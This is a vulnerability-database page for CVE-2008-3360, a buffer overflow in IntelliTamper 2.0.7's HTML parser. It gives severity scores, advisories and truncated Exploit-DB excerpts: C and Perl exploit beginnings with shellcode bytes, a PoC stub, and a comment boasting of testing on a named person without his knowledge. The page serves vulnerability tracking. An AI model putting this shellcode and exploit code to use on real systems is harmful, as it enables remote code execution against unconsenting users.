CVE-2008-3360
published 2008-07-29CVE-2008-3360: Stack-based buffer overflow in the HTML parser in IntelliTamper 2.0.7 allows remote attackers to execute arbitrary code via a long URL in the HREF attribute of…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.81%
93.9th percentile
Stack-based buffer overflow in the HTML parser in IntelliTamper 2.0.7 allows remote attackers to execute arbitrary code via a long URL in the HREF attribute of an A element, a different vulnerability than CVE-2006-2494.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intellitamper | intellitamper | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mcwf-vrgj-ww66: Buffer overflow in the HTML parser in IntelliTamper 2
ghsa_unreviewed·2022-05-02·CVSS 9.3
CVE-2008-3583 [CRITICAL] CWE-119 GHSA-mcwf-vrgj-ww66: Buffer overflow in the HTML parser in IntelliTamper 2
Buffer overflow in the HTML parser in IntelliTamper 2.07 allows remote attackers to execute arbitrary code via a long URL in the SRC attribute of an IMG element. NOTE: this might be related to CVE-2008-3360. NOTE: it was later reported that 2.08 Beta 4 is also affected.
GHSA
GHSA-pp2x-6q67-cgr6: Stack-based buffer overflow in the HTML parser in IntelliTamper 2
ghsa_unreviewed·2022-05-01·CVSS 5.1
CVE-2008-3360 [MEDIUM] CWE-119 GHSA-pp2x-6q67-cgr6: Stack-based buffer overflow in the HTML parser in IntelliTamper 2
Stack-based buffer overflow in the HTML parser in IntelliTamper 2.0.7 allows remote attackers to execute arbitrary code via a long URL in the HREF attribute of an A element, a different vulnerability than CVE-2006-2494.
No detection rules found.
Exploit-DB
IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow
exploitdb·2008-08-13
CVE-2008-3360 IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow
IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow
---
/********************************************************************/
/* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */
/********************************************************************/
/* NO MORE */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/********************************************************************/
/* Exploit testé sur Jef_FR a son insu, ca marche bien a 100% :) */
/* Jef_FR pourra vous le confirmer hihi :P */
/* Au fait c'est universel pcq si la
Exploit-DB
IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow
exploitdb·2008-07-23
CVE-2008-3360 IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow
IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow
---
/*
IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow
Just a C version of Guido Landi's discovery.
Written by r0ut3r (writ3r [at] gmail.com)
kit:/home/r0ut3r/public_html # gcc -o intell intell.c
kit:/home/r0ut3r/public_html # ./intell
[+] Building payload
[+] Success writing to index.html
kit:/home/r0ut3r/public_html #
*/
#include
#include
#include
int main(void)
{
FILE *fp;
char payload[491]; /* 464 */
/* calc.exe shellcode x86/alpha_mixed succeeded, final size 344 */
unsigned char shellcode[] =
"\xda\xc3\xd9\x74\x24\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x43\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41\x58"
"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x41\x42\x58\x50\x38
Exploit-DB
IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow
exploitdb·2008-07-22
CVE-2008-3360 IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow
IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow
---
#!/usr/bin/perl
#
use warnings;
use strict;
# CMD="c:\windows\system32\calc.exe"
# [*] x86/alpha_mixed succeeded, final size 344
my $shellcode =
"\xda\xc3\xd9\x74\x24\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a" .
"\x4a\x4a\x43\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41\x58" .
"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c" .
"\x4d\x38\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
"\x4c\x4c\x4b\x43\x4c\x44\x45\x42\x58\x45\x51\x4a\x4f\x4c\x4b" .
"\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a\x4b\x50" .
"\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x46\x51\x49\x50" .
"\x4d\x49\x4e\x4c\x4b\x34\x49\x50\x43\x44\x43\x37\x49\x51\x49" .
"\x5a
Exploit-DB
IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)
exploitdb·2008-07-21
CVE-2008-3360 IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)
IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
# k`sOSe - 07/21/2008
#
# This is NOT http://secunia.com/advisories/20172/.
# There are some BOFs in the html parser, just put a properly
# formatted html file in your website and launch IntelliTamper against it.
use warnings;
use strict;
my $evil_html = 'ph33r' .
'ph33r' .
"";
print $evil_html;
# milw0rm.com [2008-07-21]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4058http://www.securityfocus.com/bid/30317http://www.securitytracker.com/id?1020521http://www.vupen.com/english/advisories/2008/2120/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43876https://www.exploit-db.com/exploits/6103https://www.exploit-db.com/exploits/6116https://www.exploit-db.com/exploits/6121https://www.exploit-db.com/exploits/6238http://securityreason.com/securityalert/4058http://www.securityfocus.com/bid/30317http://www.securitytracker.com/id?1020521http://www.vupen.com/english/advisories/2008/2120/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43876https://www.exploit-db.com/exploits/6103https://www.exploit-db.com/exploits/6116https://www.exploit-db.com/exploits/6121https://www.exploit-db.com/exploits/6238
2008-07-29
Published